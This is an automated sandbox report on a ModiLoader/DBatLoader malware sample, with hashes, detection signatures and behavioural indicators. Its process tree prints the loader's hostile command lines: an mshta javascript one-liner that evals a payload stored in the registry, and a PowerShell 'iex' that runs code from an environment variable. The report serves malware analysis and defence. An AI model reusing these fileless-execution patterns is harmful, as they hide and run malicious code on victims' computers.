Analysis
-
max time kernel
179s -
max time network
172s -
platform
windows10-2004_x64 -
resource
win10v2004-20220812-en -
resource tags
arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system -
submitted
11/10/2022, 14:40
Static task
static1
Behavioral task
behavioral1
Sample
0d79f2cfe389511d4c45f1fe85c92c5c94e6a699c348e72d36096bee016b777c.exe
Resource
win7-20220812-en
Behavioral task
behavioral2
Sample
0d79f2cfe389511d4c45f1fe85c92c5c94e6a699c348e72d36096bee016b777c.exe
Resource
win10v2004-20220812-en
General
-
Target
0d79f2cfe389511d4c45f1fe85c92c5c94e6a699c348e72d36096bee016b777c.exe
-
Size
510KB
-
MD5
6a527509124125bed8c6ae6dba165902
-
SHA1
5ab1f9820c5d95dc6973b16ed1cee580a86ee449
-
SHA256
0d79f2cfe389511d4c45f1fe85c92c5c94e6a699c348e72d36096bee016b777c
-
SHA512
b76ab77a7b0dec818268677e0ebb1cda8e15c8b7619efead295dd979142a711e74eeda7b3aa841288c188ce48d81af96c13321c8764720bb379a8fd90281e4e8
-
SSDEEP
12288:qujL7K6wQiurgzw6wVzxzz7MagBqNVWQ+RQhzkyu:qujmQiurgz0zxzvgI/WQ+RQdkyu
Malware Config
Signatures
-
ModiLoader, DBatLoader
ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 996 1656 mshta.exe 83 -
ModiLoader Second Stage 3 IoCs
resource yara_rule behavioral2/memory/4140-133-0x0000000000400000-0x0000000000484000-memory.dmp modiloader_stage2 behavioral2/memory/4140-134-0x00000000025B0000-0x0000000002670000-memory.dmp modiloader_stage2 behavioral2/memory/4140-140-0x00000000025B0000-0x0000000002670000-memory.dmp modiloader_stage2 -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation mshta.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 376 powershell.exe 376 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 376 powershell.exe -
Suspicious use of WriteProcessMemory 3 IoCs
description pid Process procid_target PID 996 wrote to memory of 376 996 mshta.exe 85 PID 996 wrote to memory of 376 996 mshta.exe 85 PID 996 wrote to memory of 376 996 mshta.exe 85
Processes
-
C:\Users\Admin\AppData\Local\Temp\0d79f2cfe389511d4c45f1fe85c92c5c94e6a699c348e72d36096bee016b777c.exe"C:\Users\Admin\AppData\Local\Temp\0d79f2cfe389511d4c45f1fe85c92c5c94e6a699c348e72d36096bee016b777c.exe"1⤵PID:4140
-
C:\Windows\system32\mshta.exe"C:\Windows\system32\mshta.exe" javascript:u2aM5jHQki="Gy1kVTovRS";np18=new%20ActiveXObject("WScript.Shell");vS2YnNBP="xjQhd5pwA";Zyg1f=np18.RegRead("HKLM\\software\\Wow6432Node\\s7TcwhYxY\\jzqfrPZ");KhDwv1z="FAKo";eval(Zyg1f);efWKsQpa6="q";1⤵
- Process spawned unexpected child process
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:996 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" iex $env:bqhfvan2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:376
-